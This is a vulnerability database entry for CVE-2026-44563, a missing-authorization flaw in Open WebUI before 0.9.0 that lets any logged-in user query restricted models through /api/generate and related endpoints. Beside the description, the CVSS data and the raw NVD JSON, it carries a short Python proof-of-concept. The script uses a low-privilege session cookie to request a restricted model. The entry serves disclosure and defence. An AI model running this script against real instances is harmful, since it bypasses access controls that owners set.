CVE-2026-44563

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the /api/generate, /api/embed, /api/embeddings, and /api/show endpoints accept any model name from the user and forward the request to the Ollama backend without checking whether the user is authorized to access that model. These endpoints only require get_verified_user (any authenticated non-pending user) and validate that the model exists in the full unfiltered model list, but never check AccessGrants.has_access(). This vulnerability is fixed in 0.9.0.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.9.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target Open WebUI instance URL
target_url = "http://vulnerable-host:3000/api/generate"

# Valid authentication cookie for a low-privilege user
# Replace with a valid session token obtained after login
headers = {
    "Content-Type": "application/json",
    "Cookie": "auth_token=valid_low_priv_user_session_token"
}

# Payload attempting to access a restricted model
# The attacker targets a model they should not have access to (e.g., 'internal-admin-model')
payload = {
    "model": "restricted-secret-model",
    "prompt": "What is the flag?",
    "stream": False
}

try:
    response = requests.post(target_url, json=payload, headers=headers)

    if response.status_code == 200:
        print("[+] Exploit successful! Accessed restricted model.")
        print("[+] Response:", response.json())
    else:
        print("[-] Request failed. Status code:", response.status_code)
        print("[-] Response:", response.text)

except Exception as e:
    print("[-] An error occurred:", str(e))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44563
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44563
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44563/
[4] VulDB https://vuldb.com/cve/CVE-2026-44563
[5] https://github.com/open-webui/open-webui/security/advisories/GHSA-rcvp-6fgw-c7fh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44563", "sourceIdentifier": "[email protected]", "published": "2026-05-15T20:16:48.000", "lastModified": "2026-05-15T20:16:48.000", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the /api/generate, /api/embed, /api/embeddings, and /api/show endpoints accept any model name from the user and forward the request to the Ollama backend without checking whether the user is authorized to access that model. These endpoints only require get_verified_user (any authenticated non-pending user) and validate that the model exists in the full unfiltered model list, but never check AccessGrants.has_access(). This vulnerability is fixed in 0.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-rcvp-6fgw-c7fh", "source": "[email protected]"}]}}